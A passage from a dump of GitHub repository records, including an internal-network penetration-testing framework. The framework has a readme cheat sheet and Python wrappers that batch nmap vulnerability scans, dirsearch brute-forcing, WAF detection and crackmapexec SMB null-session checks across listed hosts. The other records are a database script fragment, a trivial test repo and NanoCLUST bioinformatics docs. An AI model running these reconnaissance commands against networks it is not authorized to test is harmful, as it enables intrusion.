i['Rating'])\n\n top_solutions_ids = []\n for solution in solutions[0:RATING_AMOUNT]:\n # if solution['Rating'] == 0: # TODO: uncomment\n # break\n\n top_solutions_ids.append(solution['Id'])\n\n return top_solutions_ids\n\n\ndef main(target_solution_id):\n # TODO: Use real target solution id\n # target_solution = db.engine.execute(\"SELECT * FROM Solution WHERE Id=:id FailedTest IS NULL\", {'id': target_solution_id}).first()\n target_solution = fetch(db.engine.execute(\n \"SELECT * FROM Solution WHERE TestTaskId='ff1636d5-0aab-479c-9aa2-b14271d8cdf2' AND FailedTest IS NULL LIMIT 1\"))\n if len(target_solution) == 0:\n return\n target_solution = target_solution[0]\n\n solutions = fetch(db.engine.execute(\n \"SELECT Id, OwnerId, CreatedAt FROM Solution WHERE FailedTest IS NULL AND OwnerId<>:user_id AND TestTaskId=:task_id AND ProgramingLanguageId=:language_id\",\n {\n 'user_id': target_solution['OwnerId'],\n 'task_id': target_solution['TestTaskId'],\n 'language_id': target_solution['ProgramingLanguageId']\n })) # TODO: also check by class_id/university_id later. target.createdat < i.createdAt\n\n solutions = get_last_solutions_since(target_solution['CreatedAt'], solutions)\n\n priority_solutions_ids = get_priority_solutions_ids(solutions)\n remove_solutions_by_id(solutions, priority_solutions_ids)\n\n # TODO: Check to other classes\n top_solutions_ids = get_top_solutions_ids_by_rating(solutions)\n remove_solutions_by_id(solutions, top_solutions_ids)\n\n # TODO: Check to other classes\n solutions.sort(reverse=True, key=lambda i: i['CreatedAt'])\n last_solutions = solutions[0:LAST_SOLUTIONS_AMOUNT]\n last_solutions_ids = [solution['Id'] for solution in solutions]\n\n # Compose all solutions ids\n solutions_ids = priority_solutions_ids\n solutions_ids.extend(top_solutions_ids)\n solutions_ids.extend(last_solutions_ids)\n\n return solutions_ids # TODO: add users_ids and solutions\n\n\nif __name__ != '__main__':\n sys.modules[__name__] = main\n"
}
] | 18 |
piyushimself/Internal-Network-Pentest-Framework
|
https://github.com/piyushimself/Internal-Network-Pentest-Framework
|
7242f3b332c903f30b5d171c545f897088dfd54f
|
4348ae177d207b1c6175316d49d135b31d073ce1
|
ec2262f5e2439ecff288421454c796fe078c211c
|
refs/heads/master
| 2023-03-21T20:33:12.502786 | 2020-06-10T09:50:53 | 2020-06-10T09:50:53 | null | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5484627485275269,
"alphanum_fraction": 0.5831162333488464,
"avg_line_length": 32.929203033447266,
"blob_id": "7a4fb882a050dda17bbcf6d082d933849ffae6a4",
"content_id": "925d81c4e208848082e0e7b2ce009f6dea03a61d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 3868,
"license_type": "no_license",
"max_line_length": 455,
"num_lines": 113,
"path": "/readme.md",
"repo_name": "piyushimself/Internal-Network-Pentest-Framework",
"src_encoding": "UTF-8",
"text": "# haise\n## Internal Network Pentest Framework\n\n\n\n## Internal Penetration Testing:\n\nAn Internal Penetration Test differs from a vulnerability assessment in that it actually exploits the vulnerabilities to determine what information is actually exposed. An Internal Penetration Test mimics the actions of an actual attacker exploiting weaknesses in network security without the usual dangers. This test examines internal IT systems for any weakness that could be used to disrupt the confidentiality, availability or integrity of the network\n\n## Methodology:\n\n • Internal Network Scanning\n traceroute www.google.com\n nmap 192.168.1.*\n \n • Port Scanning\n nmap -p- -T4 -iL sub.txt (Fast Scan)\n nmap -A 192.168.1.1 (Little Intense and slow)\n nmap -sV -sC -Pn -p 1-65535 -T5 --min-rate 1000 --max-retries 5 192.168.1.1\n nmap -sS -sC -sV -v -p 445 -iL subnet-files.txt\n nmap -sS -sC -sV -v -p 21 -iL subnet-files.txt\n\n Web Ports: 80, 8080, 443\n\n \n • Fingerprinting\n nmap -sV --version-intensity 5 192.168.1.1\n nc 192.168.1.1 80\n curl -sI http://192.168.1.1\n\n • Vulnerbility Scanning\n nmap --script vuln 192.168.1.1 -d\n nikto\n dirsearch\n nessus (https://localhost:8834)\n \n • IDS Penetration Testing\n lbd 45.34.23.12\n wafw00f http://192.168.1.1 \n \n • SMB Enumeration\n Discover Host:\n cme smb <subnet> (cme => crackmapexecs)\n\n Null Session:\n cme smb 192.168.24.0/24 -u '' -p ''\n smbmap –host-file smb-hosts.txt\n\n SMB Map:\n smbmap -H 192.168.1.1\n\n • Exploit Research\n https://www.exploit-db.com/\n https://www.rapid7.com/db/\n https://cxsecurity.com/search/ \n\n • Manual Vulnerability Testing and Verification\n • Password Strength Testing\n rate limiting\n sparta(tool)\n\n • Infrastructure Mapping (Maltego)\n\n DNS Server\n Firewall\n Cloud\n Employ Device\n Logging Server\n Directory Service\n Admin Workstation\n\n • Common Server Misconfiguration \n • Administrator Privileges Escalation\n • Database Security Controls Testing \n • Third-Party/Vendor Security Configuration Testing\n\n\n\n## Tool for Automation:\nInternal network could possibly contain large amount of IPs,So for automation first i generate some\none liner commands and then automate them.\n\n## Requirements:\n1. Currently only suppourt in Kali\n2. download dirsearch and place it /haise/---> here <---\n\n## Usage:\n1. git clone https://github.com/syedumerqadri/haise.git\n2. cd haise\n3. put all discoverd OR provided cilient IPs on hosts.txt\n4. python haise.py\n\nYou will got the prompt shell\n\n\n\n## Shell:\n\t\t[exit]\n\t\t[clear]\n\t\t[hosts]\tlist all hosts\n\t\t[alive]\tcheck if hosts are alive\n\t\t[ports]\tport scan of all hosts\n\t\t[dir]\tDirectory Enumuration\n\t [headers] Grab Web Headers\n\t\t[scan]\tGrab Headers, Port Scan and Directory Enumuration for all hosts \n\t\t[ids] Detect Intrusion Detection System\n\t\t[smb] Check for SMB Services\n\n\n## Results:\n\tDiscoverd Web Directories: dir_results\n\tDiscoverd Web headers: headers\n Port Scan Results: port_scan\n\n\n\n\n"
},
{
"alpha_fraction": 0.5443335175514221,
"alphanum_fraction": 0.5519671440124512,
"avg_line_length": 27.36206817626953,
"blob_id": "a3319792fef45ae709688d0540b8adb759206e05",
"content_id": "5de6db82d3bfb1d54a1c6783d481da930391799a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1703,
"license_type": "no_license",
"max_line_length": 133,
"num_lines": 58,
"path": "/nmapScanner.py",
"repo_name": "piyushimself/Internal-Network-Pentest-Framework",
"src_encoding": "UTF-8",
"text": "import urllib3\r\nimport multiprocessing.pool\r\nimport time\r\nimport os\r\n\r\nnumber_of_processes=30\r\nnmap_directory_name=\"port_scan\"\r\n\r\ndef runScan(target):\r\n print(\"Target scanning: \"+target)\r\n result = os.popen('nmap -Pn -T4 -sC -sS -sV -v -A -oA '+nmap_directory_name+'/nmap-' + target + \" \" + target).read().splitlines()\r\n\r\n\r\nurllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)\r\n\r\n\r\nif __name__ == \"__main__\":\r\n print(\" ***** nmapScanner Started ***** \")\r\n if not os.path.exists(nmap_directory_name):\r\n os.makedirs(nmap_directory_name)\r\n\r\n input_file = open(\"hosts.txt\", \"r\")\r\n targets = input_file.readlines()\r\n input_file.close()\r\n targets = [x.strip() for x in targets]\r\n\r\n if len(targets) < number_of_processes:\r\n number_of_processes = len(targets)\r\n\r\n index = 0\r\n processes = []\r\n for i in range(number_of_processes):\r\n processes.append(multiprocessing.Process(target=runScan,args=(targets[index],)))\r\n index+=1\r\n\r\n for p in processes:\r\n p.start()\r\n\r\n more_loop = True\r\n while more_loop:\r\n time.sleep(5)\r\n\r\n for i in range(0,number_of_processes) :\r\n if processes[i].is_alive():\r\n processes[i].join(1)\r\n #print(\"jobs is not finished\")\r\n else:\r\n if index >= len(targets):\r\n for p in processes:\r\n p.join()\r\n more_loop = False\r\n break\r\n processes[i] = multiprocessing.Process(target=runScan,args=(targets[index],))\r\n processes[i].start()\r\n index+=1\r\n\r\n print(\"Port Scan Complete !!!\")\r\n exit(0)\r\n"
},
{
"alpha_fraction": 0.6039823293685913,
"alphanum_fraction": 0.616150438785553,
"avg_line_length": 23.880733489990234,
"blob_id": "e80a0db2c6fba08cb175a53bc0a352c4e1249fed",
"content_id": "5cb37dfa8784342183853e99cdf9b7bc1056ac97",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2712,
"license_type": "no_license",
"max_line_length": 311,
"num_lines": 109,
"path": "/haise.py",
"repo_name": "piyushimself/Internal-Network-Pentest-Framework",
"src_encoding": "UTF-8",
"text": "import os\nimport sys\n\nred = \"\\033[1;31;40m\"\nclear = \"\\033[1;0;00m\"\n\n\nprint red + '''\n _ _ \n| |_ __ _(_)___ ___ \n| ' \\/ _` | (_-</ -_)\n|_||_\\__,_|_/__/\\___|\n\n''' + clear + '''>> Internal Pentest Framework <<'''\n\ncommand = 1\nprint(\"\\n\")\n\ndir_exist = os.popen(\"ls | grep -c 'dir_results'\").read()\nR_DIR = int(dir_exist)\n\nif R_DIR == 1:\n\tprint(\"\")\n\nelif R_DIR == 0:\n\tos.system(\"mkdir dir_results\")\n\nelse:\n\tprint(\"Something went wrong\")\n\n\ndir_exist = os.popen(\"ls | grep -c headers\").read()\nR_DIR = int(dir_exist)\n\nif R_DIR == 1:\n\tprint(\"\")\n\nelif R_DIR == 0:\n\tos.system(\"mkdir headers\")\n\n\ndir_exist = os.popen(\"ls | grep -c port_scan\").read()\nR_DIR = int(dir_exist)\n\nif R_DIR == 1:\n\tprint(\"\")\n\nelif R_DIR == 0:\n\tos.system(\"mkdir port_scan\")\n\n\nwhile command != \"exit\":\n\tcommand = raw_input(\"COMMAND\"+red+\"|>\" + clear)\n\n\tif command == \"\":\n\t\tcommand = 1\n\n\telif command == \"hosts\":\n\t\tprint(\"\\n\")\n\t\tos.system('cat hosts.txt')\n\t\tprint(\"\\n\")\n\n\telif command == \"alive\":\n\t\tos.system('nmap -sn -iL hosts.txt')\n\n\telif command == \"clear\":\n\t\tos.system('clear')\n\n\telif command == \"ports\":\n\t\tos.system('python3 nmapScanner.py')\n\n\telif command == \"dir\":\n\t\tos.system(\"cat hosts.txt | xargs -I{} python3 dirsearch/dirsearch.py -u http://{} -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e php,jsp,rb,py,js,asp,aspx,zip,sql,tar,txt,key,doc,docx,html,jar,groovy,back,xml,ini,inc,config,json,yml,conf,cgi --plain-text-report=dir_results/http:{}.txt\")\n\n\telif command == \"headers\":\n\t\tos.system(\"cat hosts.txt | xargs -I{} sh -c 'curl -sI http://{} > headers/{}.txt'\")\n\n\telif command == \"ids\":\n\t\tos.system(\"cat hosts.txt | xargs -I{} sh -c 'lbd {} | grep does'\")\n\t\tos.system(\"cat hosts.txt | xargs -I{} sh -c 'wafw00f {} | grep site'\")\n\n\telif command == \"scan\":\n\t\tos.system('python3 nmapScanner.py')\n\t\tos.system(\"cat hosts.txt | xargs -I{} python3 dirsearch/dirsearch.py -u http://{} -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e php,jsp,rb,py,js,asp,aspx,zip,sql,tar,txt,key,doc,docx,html,jar,groovy,back,xml,ini,inc,config,json,yml,conf,cgi --plain-text-report=dir_results/http:{}.txt\")\n\t\tos.system(\"cat hosts.txt | xargs -I{} sh -c 'curl -sI http://{} > headers/{}.txt'\")\n\n\telif command == \"smb\":\n\t\tos.system(\"cat hosts.txt | xargs -I{} sh -c 'crackmapexec smb {}'\")\n\n\n\telif command == \"help\":\n\n\t\tprint '''\n\t\t[exit]\n\t\t[clear]\n\t\t[hosts]\tlist all hosts\n\t\t[alive]\tcheck if hosts are alive\n\t\t[ports]\tport scan of all hosts\n\t\t[dir]\tDirectory Enumuration\n\t [headers]\tGrab Web Headers\n\t\t[scan]\tGrab Headers, Port Scan and Directory Enumuration for all hosts \n\t\t[ids] Detect Intrusion Detection System\n\t\t[smb] Check for SMB Services\n\n\n\t\t'''\n\n\telse:\n\t\tprint \"[+] Unknown Command\"\n"
}
] | 3 |
SamBT/Test-Repo
|
https://github.com/SamBT/Test-Repo
|
9cec053c2cc8c925187e0d42382c3386f68f5d7d
|
05209a83516240021abaf0996fda5629eeb9fbc7
|
2a92fb3baa88711a28907bddba9ceafc2122691a
|
refs/heads/master
| 2021-01-23T13:43:18.301608 | 2015-03-15T02:58:21 | 2015-03-15T02:58:21 | 32,242,386 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.7283950448036194,
"alphanum_fraction": 0.7283950448036194,
"avg_line_length": 39,
"blob_id": "b6fe6271abb60e1e68bef30c8209bd199a1e513e",
"content_id": "42833d30c01a0cce094a72ece0c9ae5b00a7d172",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 81,
"license_type": "no_license",
"max_line_length": 58,
"num_lines": 2,
"path": "/test.py",
"repo_name": "SamBT/Test-Repo",
"src_encoding": "UTF-8",
"text": "def new_function(r):\n print(\"Testing to see if this will pull back correctly\")\n\n"
}
] | 1 |
genomicsITER/NanoCLUST
|
https://github.com/genomicsITER/NanoCLUST
|
1abccf4c6b7e898dd5cf39aef4acf3314bbe04e6
|
9364ddcc96d7f90c34e97c4baa858835c9b0a943
|
4c7a44c7f53358b6439e43b9d1da435cb4643740
|
refs/heads/master
| 2023-06-21T16:13:18.241829 | 2022-11-29T16:12:58 | 2022-11-29T16:12:58 | 252,573,945 | 71 | 41 |
MIT
| 2020-04-02T22:00:26 | 2021-12-13T22:44:22 | 2021-12-20T10:03:45 |
Nextflow
|
[
{
"alpha_fraction": 0.7991940975189209,
"alphanum_fraction": 0.7991940975189209,
"avg_line_length": 48.63333511352539,
"blob_id": "283acdc498342a7a20c8c23317c8811e897918e8",
"content_id": "609741f968c1ce1db7d80f7bbf14de566559fcb2",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 2978,
"license_type": "permissive",
"max_line_length": 325,
"num_lines": 60,
"path": "/docs/3pipeline_output.md",
"repo_name": "genomicsITER/NanoCLUST",
"src_encoding": "UTF-8",
"text": "# Pipeline output\n\nThis page describes the output produced by the pipeline.\n\n## QC reports\n\n### FastQC\n[FastQC](http://www.bioinformatics.babraham.ac.uk/projects/fastqc/) gives general quality metrics about your reads. It provides information about the quality score distribution across your reads and the per base sequence content (%T/A/G/C). You get information about adapter contamination and other overrepresented sequences.\n\nFor further reading and documentation see the [FastQC help](http://www.bioinformatics.babraham.ac.uk/projects/fastqc/Help/).\n\n> **NB:** The FastQC plots displayed in the MultiQC report shows _untrimmed_ reads. They may contain adapter sequence and potentially regions with low quality. To see how your reads look after trimming, look at the FastQC reports in the `trim_galore` directory.\n\n**Output directory: `results/fastqc`**\n\n* `sample_fastqc.html`\nFastQC report, containing quality metrics for your untrimmed raw fastq files\n\n* `zips/sample_fastqc.zip`\nzip file containing the FastQC report, tab-delimited data file and plot images\n\n\n### MultiQC\n[MultiQC](http://multiqc.info) is a visualisation tool that generates a single HTML report summarising all samples in your project. Most of the pipeline QC results are visualised in the report and further statistics are available in the report data directory.\n\n**Output directory: `results/multiqc`**\n\n* `Project_multiqc_report.html`\nMultiQC report - a standalone HTML file that can be viewed in your web browser\n* `Project_multiqc_data/`\nDirectory containing parsed statistics from the different tools used in the pipeline\n\n## NanoCLUST output\n\n### UMAP and HDBSCAN steps\nThe pipeline uses UMAP technique to project sequence read data. The cluster assignment is performed by HDBSCAN. \n\n* `results/sample_name/output.hdbscan.tsv`\nHDBSCAN raw output in TSV format. Contains the read IDs and assigned cluster\n\n### Polished sequences extraction and classification\nNanoCLUST builds a polished sequence from each cluster using Canu, Racon and Medaka. The sequence is then classified using blastn and a local database provided by the user. The polished sequence and the classification output table is included in the output:\n\n* `results/sample_name/clusterX/draft_read.fasta`\nDraft sequence extracted from the cluster\n\n* `results/sample_name/clusterX/consensus_medaka.fasta`\nDraft sequence extracted from the cluster\n\n* `results/sample_name/clusterX/consensus_classification.csv`\nBlast classification output \n\n### Additional plots\nNanoCLUST generates the UMAP projection plot and stacked barplots for single and pooled samples at different taxonomic levels. The plot module uses the taxid included in the classification table and [Unipept Taxonomy API](http://api.unipept.ugent.be)\n\n* `results/sample_name/hdbscan.output.png`\nUMAP projection and HDBSCAN clustering plot.\n\n* `results/rel_abundance_[FGS].png`\nRelative abundance barplot at different taxonomic levels for samples processed by the pipeline. "
},
{
"alpha_fraction": 0.7287843823432922,
"alphanum_fraction": 0.7397744655609131,
"avg_line_length": 44.70535659790039,
"blob_id": "881612ea1e9d658a8c3ed339bb3a1b4d8047f075",
"content_id": "71e23e20ace3bef23c18a1adfe8e2a6f7dbd5bc9",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 10464,
"license_type": "permissive",
"max_line_length": 402,
"num_lines": 224,
"path": "/docs/2usage.md",
"repo_name": "genomicsITER/NanoCLUST",
"src_encoding": "UTF-8",
"text": "# Usage\r\n\r\n## Introduction\r\nNextflow handles job submissions on SLURM or other environments, and supervises the run. Thus the Nextflow process must run until the pipeline is finished. We recommend that you put the process running in the background through `screen` / `tmux` or similar tool. Alternatively you can run Nextflow within a cluster job submitted your job scheduler.\r\n\r\nIt is recommended to limit the Nextflow Java virtual machines memory. We recommend adding the following line to your environment (typically in `~/.bashrc` or `~./bash_profile`):\r\n\r\n```bash\r\nNXF_OPTS='-Xms1g -Xmx4g'\r\n```\r\n\r\n<!-- TODO nf-core: Document required command line parameters to run the pipeline-->\r\n\r\n## Running the pipeline\r\nThe typical command for running the pipeline is as follows:\r\n\r\n```bash\r\nnextflow run main.nf --reads 'data/mock_sample.fastq' --db 'db/blastdb' --tax 'db/taxdb' -profile <conda,docker>\r\n```\r\nThis will launch the pipeline with the `conda` or `docker` configuration profiles. See below for more information about profiles.\r\n\r\n*Database and taxdb should be downloaded in the NanoCLUST dir.\r\n\r\n*--min_cluster_size and --polishing reads have default values to 50 and 100 respectively. We recommend to manually assign these when working with your own data to see how the pipeline output may change specially at low taxonomic levels such as species.\r\n\r\nNote that the pipeline will create the following files in your working directory:\r\n\r\n```bash\r\nwork # Directory containing the nextflow working files\r\nresults # Finished results (configurable, see below)\r\n.nextflow_log # Log file from Nextflow\r\n# Other nextflow hidden files, eg. history of pipeline runs and old logs.\r\n```\r\n\r\n### Updating the pipeline\r\nWhen you run the above command, Nextflow automatically pulls the pipeline code from GitHub and stores it as a cached version. When running the pipeline after this, it will always use the cached version if available - even if the pipeline has been updated since. To make sure that you're running the latest version of the pipeline, make sure that you regularly update the cached version of the pipeline:\r\n\r\n```bash\r\nnextflow pull nf-core/nanoclust\r\n```\r\n\r\n### Reproducibility\r\nIt's a good idea to specify a pipeline version when running the pipeline on your data. This ensures that a specific version of the pipeline code and software are used when you run your pipeline. If you keep using the same tag, you'll be running the same version of the pipeline, even if there have been changes to the code since.\r\n\r\nFirst, go to the [nf-core/nanoclust releases page](https://github.com/nf-core/nanoclust/releases) and find the latest version number - numeric only (eg. `1.3.1`). Then specify this when running the pipeline with `-r` (one hyphen) - eg. `-r 1.3.1`.\r\n\r\nThis version number will be logged in reports when you run the pipeline, so that you'll know what you used when you look back in the future.\r\n\r\n\r\n## Main arguments\r\n\r\n#### `-profile`\r\nUse this parameter to choose a configuration profile. Profiles can give configuration presets for different compute environments. Note that multiple profiles can be loaded, for example: `-profile docker` - the order of arguments is important!\r\n\r\nIf `-profile` is not specified at all, the pipeline will be run locally and expects all software to be installed and available on the `PATH`.\r\n\r\n* `conda`\r\nA generic configuration profile to be used with [conda](https://conda.io/docs/)\r\nPulls most software from [Bioconda](https://bioconda.github.io/)\r\n\r\n* `docker`\r\nA generic configuration profile to be used with [Docker](http://docker.com/)\r\nPulls software from dockerhub: [`nfcore/nanoclust`](http://hub.docker.com/r/nfcore/nanoclust/)\r\n\r\n* `singularity`\r\nA generic configuration profile to be used with [Singularity](http://singularity.lbl.gov/)\r\nPulls software from DockerHub: [`nfcore/nanoclust`](http://hub.docker.com/r/nfcore/nanoclust/)\r\n\r\n* `test`\r\nA profile with a complete configuration for automated testing\r\nIncludes links to test data so needs no other parameters\r\n\r\n<!-- TODO nf-core: Document required command line parameters -->\r\n\r\n#### `--reads`\r\nUse this to specify the location of your input FastQ files. For example:\r\n\r\n```bash\r\n--reads 'sample.fastq'\r\n```\r\n\r\nPlease note the following requirements:\r\n\r\n1. The path must be enclosed in quotes\r\n2. The path must have at least one `*` wildcard character\r\n\r\n#### `--demultiplex`\r\nIf you have pooled data, you need to specify `--demultiplex` on the command line to enable initial demultiplex process of samples.\r\n\r\n#### `--demultiplex_porechop`\r\nSame as above but uses porechop software for demultiplexing.\r\n\r\n```bash\r\n--reads 'pooled_sample.fastq' --demultiplex[_porechop]\r\n```\r\n\r\n#### `--kit` (RAB204)\r\n(Only with --demultiplex). Barcoding kit\r\n\r\nKits supported:\r\n{Auto,PBC096,RBK004,NBD104/NBD114,PBK004/LWB001,RBK001,RAB204,VMK001,PBC001,NBD114,NBD103/NBD104,DUAL,RPB004/RLB001}\r\n\r\n## UMAP and HDBSCAN configuration parameters\r\n\r\n#### `--umap_set_size` (default 100000)\r\nNumber of reads that are used for the UMAP projection.\r\n\r\n#### `--cluster_sel_epsilon` (0.5)\r\nMinimum distance to separate a cluster from another. This parameter will depend on your input data and may have practical effect on the number of clusters generated. More information is available in [HDBSCAN parameter section](https://hdbscan.readthedocs.io/en/latest/parameter_selection.html).\r\n\r\n#### `--min_cluster_size` (100)\r\nMinimum number of reads necessary to call a cluster. Note that sensitivity decreases when this parameter is increased.\r\n\r\n## Polishing parameters\r\n\r\n#### `--polishing_reads` (100)\r\nNumbers of reads used in the canu, racon and medaka polishing steps.\r\n\r\n## Taxonomic and taxdb databases \r\n\r\nThe pipeline uses blastn software for the classification of the polished sequence of each cluster. The following parameters allows database configuration:\r\n\r\n#### `--db`\r\nPath to the local blast database. Database files can be downloaded using FTP directly from [NCBI](ftp://ftp.ncbi.nlm.nih.gov/blast/db/)\r\n\r\nFor 16S rRNA database, download 16S_ribosomal_RNA.tar.gz, decompress the file under a db directory and specify the full path:\r\n * `--db \"/path/to/nanoclust/db/16S_ribosomal_RNA\"`\r\n\r\n#### `--tax`\r\n--db option will only output the tax ID for the target. For complete classification output, specify the taxdb path along with the local database. Taxdb database is also available from [NCBI databases](ftp://ftp.ncbi.nlm.nih.gov/blast/db/) (taxdb.tar.gz)\r\n\r\n\r\n## Job resources\r\n### Automatic resubmission\r\nEach step in the pipeline has a default set of requirements for number of CPUs, memory and time. For most of the steps in the pipeline, if the job exits with an error code of `143` (exceeded requested resources) it will automatically resubmit with higher requests (2 x original, then 3 x original). If it still fails after three times then the pipeline is stopped.\r\n\r\n## Other command line parameters\r\n\r\n<!-- TODO nf-core: Describe any other command line flags here -->\r\n\r\n#### `--min_read_length`\r\nMinimum length of reads (bp) used in analysis.\r\n\r\n#### `--max_read_length`\r\nMaximum length of reads (bp) used in analysis.\r\n\r\n#### `--outdir`\r\nThe output directory where the results will be saved.\r\n\r\n#### `--email`\r\nSet this parameter to your e-mail address to get a summary e-mail with details of the run sent to you when the workflow exits. If set in your user config file (`~/.nextflow/config`) then you don't need to specify this on the command line for every run.\r\n\r\n#### `--email_on_fail`\r\nThis works exactly as with `--email`, except emails are only sent if the workflow is not successful.\r\n\r\n#### `-name`\r\nName for the pipeline run. If not specified, Nextflow will automatically generate a random mnemonic.\r\n\r\nThis is used in the MultiQC report (if not default) and in the summary HTML / e-mail (always).\r\n\r\n**NB:** Single hyphen (core Nextflow option)\r\n\r\n#### `-resume`\r\nSpecify this when restarting a pipeline. Nextflow will used cached results from any pipeline steps where the inputs are the same, continuing the pipeline steps from there.\r\n\r\nYou can also supply a run name to resume a specific run: `-resume [run-name]`. Use the `nextflow log` command to show previous run names.\r\n\r\n**NB:** Single hyphen (core Nextflow option)\r\n\r\n#### `-c`\r\nSpecify the path to a specific config file (this is a core Nextflow command).\r\n\r\n**NB:** Single hyphen (core Nextflow option)\r\n\r\nNote - you can use this to override pipeline defaults.\r\n\r\n#### `--custom_config_version`\r\nProvide git commit id for custom Institutional configs hosted at `nf-core/configs`. This was implemented for reproducibility purposes. Default is set to `master`.\r\n\r\n```bash\r\n## Download and use config file with following git commid id\r\n--custom_config_version d52db660777c4bf36546ddb188ec530c3ada1b96\r\n```\r\n\r\n#### `--custom_config_base`\r\nIf you're running offline, nextflow will not be able to fetch the institutional config files\r\nfrom the internet. If you don't need them, then this is not a problem. If you do need them,\r\nyou should download the files from the repo and tell nextflow where to find them with the\r\n`custom_config_base` option. For example:\r\n\r\n```bash\r\n## Download and unzip the config files\r\ncd /path/to/my/configs\r\nwget https://github.com/nf-core/configs/archive/master.zip\r\nunzip master.zip\r\n\r\n## Run the pipeline\r\ncd /path/to/my/data\r\nnextflow run /path/to/pipeline/ --custom_config_base /path/to/my/configs/configs-master/\r\n```\r\n\r\n> Note that the nf-core/tools helper package has a `download` command to download all required pipeline\r\n> files + singularity containers + institutional configs in one go for you, to make this process easier.\r\n\r\n#### `--max_memory`\r\nUse to set a top-limit for the default memory requirement for each process.\r\nShould be a string in the format integer-unit. eg. `--max_memory '8.GB'`\r\n\r\n#### `--max_time`\r\nUse to set a top-limit for the default time requirement for each process.\r\nShould be a string in the format integer-unit. eg. `--max_time '2.h'`\r\n\r\n#### `--max_cpus`\r\nUse to set a top-limit for the default CPU requirement for each process.\r\nShould be a string in the format integer-unit. eg. `--max_cpus 1`\r\n\r\n#### `--plaintext_email`\r\nSet to receive plain-text e-mails instead of HTML formatted.\r\n\r\n#### `--monochrome_logs`\r\nSet to disable colourful command line output and live life in monochrome.\r\n\r\n#### `--multiqc_config`\r\nSpecify a path to a custom MultiQC configuration file.\r\n\r\n"
},
{
"alpha_fraction": 0.7495150566101074,
"alphanum_fraction": 0.7764306664466858,
"avg_line_length": 59.64706039428711,
"blob_id": "5847f032184c6b3a5835425426dd758de1c5bb59",
"content_id": "949e96427244c22aa43a2915940be34bdfd87925",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 4133,
"license_type": "permissive",
"max_line_length": 651,
"num_lines": 68,
"path": "/README.md",
"repo_name": "genomicsITER/NanoCLUST",
"src_encoding": "UTF-8",
"text": "# NanoCLUST\n\n**De novo clustering and consensus building for ONT 16S sequencing data**.\n\n## Introduction\n\nThe pipeline is built using [Nextflow](https://www.nextflow.io), a workflow tool to run tasks across multiple compute infrastructures in a very portable manner. It comes with docker containers making installation trivial and results highly reproducible.\n\n## Quick Start\n\ni. Install [`nextflow`](https://nf-co.re/usage/installation)\n\nii. Install [`docker`](https://docs.docker.com/engine/installation/) or [`conda`](https://conda.io/miniconda.html)\n\niii. Clone the NanoCLUST repository and test the pipeline on a minimal dataset with a single command and docker/conda profiles.\n\n*Download a BLAST database in the NanoCLUST dir for cluster sequence classification. For NCBI 16S rRNA database:\n\n```bash\nmkdir db db/taxdb\nwget https://ftp.ncbi.nlm.nih.gov/blast/db/16S_ribosomal_RNA.tar.gz && tar -xzvf 16S_ribosomal_RNA.tar.gz -C db\nwget https://ftp.ncbi.nlm.nih.gov/blast/db/taxdb.tar.gz && tar -xzvf taxdb.tar.gz -C db/taxdb\n```\n\n```bash\n#Using docker profile with container-based dependencies (recommended).\nnextflow run main.nf -profile test,docker\n```\n\niv. Start running your own analysis!\n\nRun a single sample analysis inside NanoCLUST dir using default parameters:\n\n```bash\nnextflow run main.nf \\ \n -profile docker \\ \n --reads 'sample.fastq' \\ \n --db \"db/16S_ribosomal_RNA\" \\ \n --tax \"db/taxdb/\"\n```\n\nSee usage and output sections in the documentation (/docs) for all of the available options when running the pipeline.\n\n## Computing requirements note\n\nClustering step uses up to 32-36GB RAM when working with a real dataset analysis and default parameters (umap_set_size = 100000). Setting umap_set_size to 50000, will diminish memory consumption to 10-13GB RAM. When running the pipeline, kmer_freqs or mostly read_clustering processes could be terminated with status 137 when not enough RAM.\n\nNextflow automatically uses all available resources in your machine. More cpu threads enable the pipeline to compute and classify the different clusters at the same time and hence reduces the overall execution time.\n\nUsing the -with-trace option, it is possible to get an execution trace file which includes computing times and memory consumption metrics for all pipeline processes.\n\n*The execution of the test profile (minimum testing dataset and default parameters) can be done with a regular 4 cores and 16GB RAM machine.\n\n## Troubleshooting\n\n- Using conda profile, some issues can arise due to unknown problems with the read_clustering and kmer_freq conda environments. If it is the case, we recommend using the docker profile to ensure all dependencies run in the right environments and these are tested and available in the cloud (automatically downloaded when using docker profile).\n\n- In some machines, the read_clustering process exits with error status(_RuntimeError: cannot cache function '...'_). We have seen that this condition can be avoided running the pipeline with sudo privileges (even if Docker was previously available without sudo permissions). \n\n## Credits\n\nRodríguez-Pérez H, Ciuffreda L, Flores C. NanoCLUST: a species-level analysis of 16S rRNA nanopore sequencing data. Bioinformatics. 2021;37(11):1600-1601. doi:https://doi.org/10.1093/bioinformatics/btaa900\n\nThis work was supported by Instituto de Salud Carlos III [PI14/00844, PI17/00610, and FI18/00230] and co-financed by the European Regional Development Funds, “A way of making Europe” from the European Union; Ministerio de Ciencia e Innovación [RTC-2017-6471-1, AEI/FEDER, UE]; Cabildo Insular de Tenerife [CGIEU0000219140]; Fundación Canaria Instituto de Investigación Sanitaria de Canarias [PIFUN48/18]; and by the agreement with Instituto Tecnológico y de Energías Renovables (ITER) to strengthen scientific and technological education, training, research, development and innovation in Genomics, Personalized Medicine and Biotechnology [OA17/008]. \n\n## Contributions and Support\n\nIf you would like to contribute to this pipeline, please see the [contributing guidelines](.github/CONTRIBUTING.md).\n"
},
{
"alpha_fraction": 0.5976190567016602,
"alphanum_fraction": 0.6136904954910278,
"avg_line_length": 31.30769157409668,
"blob_id": "0de535d750f34d73c673fc0a698a4cfc6a068470",
"content_id": "0097ffe925603508ceb2cabc7b754e86d0c46bb4",
"detected_licenses": [
"MIT"
],
